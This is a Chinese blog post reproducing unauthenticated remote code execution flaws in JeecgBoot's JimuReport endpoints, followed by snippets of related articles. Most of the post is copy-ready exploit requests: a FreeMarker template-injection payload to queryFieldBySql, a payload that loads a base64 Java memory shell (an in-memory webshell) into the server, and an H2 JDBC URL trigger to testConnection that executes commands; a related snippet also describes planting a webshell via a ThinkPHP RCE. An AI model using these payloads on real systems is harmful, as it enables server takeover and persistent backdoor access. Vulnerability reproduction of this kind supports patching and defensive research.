[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现

已于 2024-07-02 09:07:47 修改
阅读量2.7k 收藏 8
点赞数 13
文章标签: 安全
于 2024-07-02 09:02:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LiangYueSec/article/details/140116873
版权

如果觉得改博主的文章对您有帮助的话,麻烦可以移步同名公众号:良月安全。点一个关注,感谢各位师傅支持。

想了解漏洞的具体分析可以去c0olw师傅的博客,这里引个路:JeecgBoot SSTI以及JDBC RCE 复现 | 凉风’s Blog (c0olw.github.io)

queryFieldBySql内存马5

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 123

{"sql":"select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"open -a calculator.app  \") }' "}

注入内存马,这里利用pen4uin师傅的内存马工具pen4uin/java-memshell-generator: 一款支持高度自定义的 Java 内存马生成工具|A highly customizable Java memory-shell generation tool. (github.com)

使用内存马工具生成payload,将生成的base64格式的内存马 替换payload 中bytecodeBase64的值

{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='这里填入base64的内存马';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}

在这里插入图片描述
内存马路径为:http://ip:port/jeecg-boot/jmreport/queryFieldBySql/
在这里插入图片描述

JDBC RCE

POST /jeecgboot/jmreport/testConnection HTTP/1.1
Host: ip:port
Content-Length: 383
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
  "id": "1",
  "code": "dataSource1",
  "dbType": "H2",
  "dbDriver": "org.h2.Driver",
  "dbUrl": "jdbc:h2:mem:test;init=CREATE TRIGGER shell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('open -a calculator.app')\u000A$$",
  "dbName": "test",
  "dbUsername": "sa",
  "dbPassword": "",
  "connectTimes": 5
}

在这里插入图片描述

LiangYueSec
关注
JeecgBoot JimuReport testConnection RCE漏洞复现
0xSec
12-12 2191
JeecgBootjeecg-boot/jmreport/testConnection 未进行身份验证,并且未对 dbUrl 参数进行限制,当应用端存在H2数据库驱动依赖时,攻击者发送包含恶意 dbUrl 参数的 http 请求远程执行任意代码。
jeecg-boot queryFieldBySql接口基于SSTI的任意代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
12-10 604
JeecgBoot 受影响版本中由于积木报表 /jeecg-boot/jmreport/queryFieldBySql Api接口未进行身份校验,使用 Freemarker 处理用户用户传入的 sql 参数,未经授权的攻击者可发送包含恶意 sql 参数的 http 请求,通过 SSTI 在应用端执行任意代码。
漏洞复现JeecgBoot 积木报表 queryFieldBySql sql注入漏洞
qq_48368964的博客
10-01 1479
JeecgBoot 积木报表 queryFieldBySq| 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。积木报表,是一款免费的企业级Web报表工具,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等!title="Jeecg-Boot 快速开发平台" || body="积木报表"2、通过防火墙等安全设备设置访问策略,设置白名单访问。
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
fly夏天的博客
03-20 5545
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
CVE-2023-1454注入分析复现
蚁景网安学院
07-17 1917
JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。
JEECG-BOOT存在SQL注入漏洞[附POC]
Liyu_6618的博客
02-01 1813
JEECG-BOOT存在SQL注入漏洞[附POC]
JeecgBoot 权限绕过致AviatorScript表达式注入漏洞复现
最新发布
0xSec
10-08 823
JeecgBoot 存在权限绕过漏洞,未经身份验证的远程攻击者可构造jmLink、sharetoken参数或JmReport-Share-Token请求头绕过权限认证访问后台接口,进一步深入利用可实现远程代码执行、木植入,导致服务器失陷等问题。
JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 2634
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
漏洞复现JeecgBoot 积木报表 testConnection JDBC 远程代码执行
alert['Hello World']
07-08 1351
JeecgBoot 积木报表 testConnection 接口存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限。积木报表,是一款免费的企业级Web报表工具,像搭建积木一样在线设计报表!功能涵盖,数据报表、打印设计、图表报表、大屏设计等!
CVE-2023-1454:Jeecg-Boot SQL注入漏洞复现
薛定谔嘚喵博客
09-15 1559
JeecgBoot 受影响版本中由于积木报表 /jeecg-boot/jmreport/queryFieldBySql Api 接口未进行身份校验,使用 Freemarker 处理用户用户传入的 sql 参数,未经授权的攻击者可发送包含恶意 sql 参数的 http 请求,通过 SSTI 在应用端执行任意代码。
Jeecg-Boot 未授权SQL注入漏洞(CVE-2023-1454)
qq_27536045的博客
04-04 5170
原创文章创作不易,个人博客charis3306.top。
Jeecg jeecgFormDemoController RCE漏洞复现(CVE-2023-49442)
0xSec
01-22 1367
Jeecg(J2EE Code Generation) 是开源的代码生成平台,目前官方已停止维护。Jeecg4.0及之前版本中,由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 ../ 的url绕过鉴权。并且内部有使用fastjson1.2.31漏洞版本,攻击者可构造恶意请求利用 jeecgFormDemoController.do?interfaceTest 接口进行 jndi 注入攻击实现远程代码执行,获取服务器权限。
Jeecg-Boot 存在前台SQL注入漏洞(CVE-2023-1454)
nnn2188185的博客
04-10 6518
jeecg-boot 3.5.0版本存在SQL注入漏洞,该漏洞源于文件 jmreport/qurestSql 存在安全问题, 通过参数 apiSelectId 导致SQL注入
漏洞复现--JeecgBoot testConnection 远程代码执行
qq_53003652的博客
12-20 3684
JeecgBoot 是一款基于代码生成器的低代码开发平台,该产品存在testConnection 远程命令执行漏洞JeecgBoot积木报表。
Jeecg-Boot 存在前台SQL注入漏洞【CVE-2023-1454】
holyxp的博客
07-02 5146
eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!
JeecgBoot 远程命令执行漏洞:网络安全分析
YtyVerilog的博客
09-24 1213
为了保护应用程序和服务器的安全,开发者应该采取适当的安全措施,如输入验证和过滤、使用安全的API、文件上传验证、最小权限原则和及时更新。然而,在早期版本的JeecgBoot中存在一个远程代码执行漏洞,该漏洞可能导致攻击者执行任意系统命令,进而危及整个应用程序和服务器的安全。远程代码执行漏洞是Web应用程序中常见的安全漏洞之一,它允许攻击者通过恶意构造的输入来执行任意的系统命令,从而导致潜在的安全风险。输入验证和过滤:对于用户的输入,特别是涉及到执行系统命令的地方,应该进行充分的验证和过滤。
JeecgBoot jmreport/loadTableData RCE漏洞复现(CVE-2023-41544)
0xSec
01-31 1527
JeecgBootjmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值